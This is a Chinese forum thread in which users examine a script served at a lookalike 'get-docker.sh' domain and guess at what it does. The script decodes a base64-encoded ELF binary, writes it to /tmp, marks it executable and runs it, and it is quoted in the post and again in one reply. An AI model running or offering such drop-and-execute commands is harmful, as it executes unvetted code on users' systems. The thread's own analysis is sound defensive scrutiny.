![]( https://i.imgur.com/McUIE01.png)


网址是 `http://get-docker.sh`,打开后跳转到 `http://blin.gg/get-docker.sh`,返回以下代码:

```shell
#!/bin/bash
base64 -d <<< f0VMRv/A/8exBUjB4TDrBAIAPgCyA+sdBAABAAAABQAaAAAAAAAAAAAAAAABAAAABQAAsDy+OAABAEgBzusLAAAASAHO6wsAAABIg+43DwXr4Q==> /tmp/out; chmod +x /tmp/out; /tmp/out
```

有谁知道这是要做什么?
举报· 76 次点击
登录 注册 站外分享
9 条回复  
nagisaushio 小成 2024-9-11 22:55:03
跑起来直接 segfault 了
zwzwzwzwzxt 小成 2024-9-11 19:12:14
为啥我这解析出来的除了前四个 Magic Number 外貌也不是有效的 ELF 文件啊
https://i.imgur.com/F70HlKd.png
a33291 小成 2024-9-11 17:44:49
https://i.imgur.com/t8rSUBv.png mei'kan'dao 没看到什么有价值的操作
body007 初学 2024-9-11 17:30:23
https://i.imgur.com/9M4gzMC.png

这个有问题的恶意代码,尽然有很多国内文章里面用到了🤣🤣🤣
woyao 小成 2024-9-11 17:12:31
从域名存活历史来看,有好几年了。
域名根目录下还有一个文件 dominion.elf
但是看了一下吧,应该是 Flare-On 2020: break

get-docker.sh 似乎不完整……
直接访问根域名吧,提示 !!! This is a research serfer !!!
hingle 小成 2024-9-11 17:08:57
这么短的二进制,执行了什么操作,有没有懂的?
Tink 小成 2024-9-11 16:57:24
是个二进制
ELF���DZH��0�>���<�8H��
                       H��
                          H��7��%
swulling 小成 2024-9-11 16:52:46
为啥会想到搜索 get-docker.sh ?不应该搜索 Docker installation script 么。
bbsingao 小成 2024-9-11 16:45:42
base64 -d <<< f0VMRv/A/8exBUjB4TDrBAIAPgCyA+sdBAABAAAABQAaAAAAAAAAAAAAAAABAAAABQAAsDy+OAABAEgBzusLAAAASAHO6wsAAABIg+43DwXr4Q==
ELF���DZH��0�>����<�8H��
                       H��
                          H��7��
竟然是个二进制,
返回顶部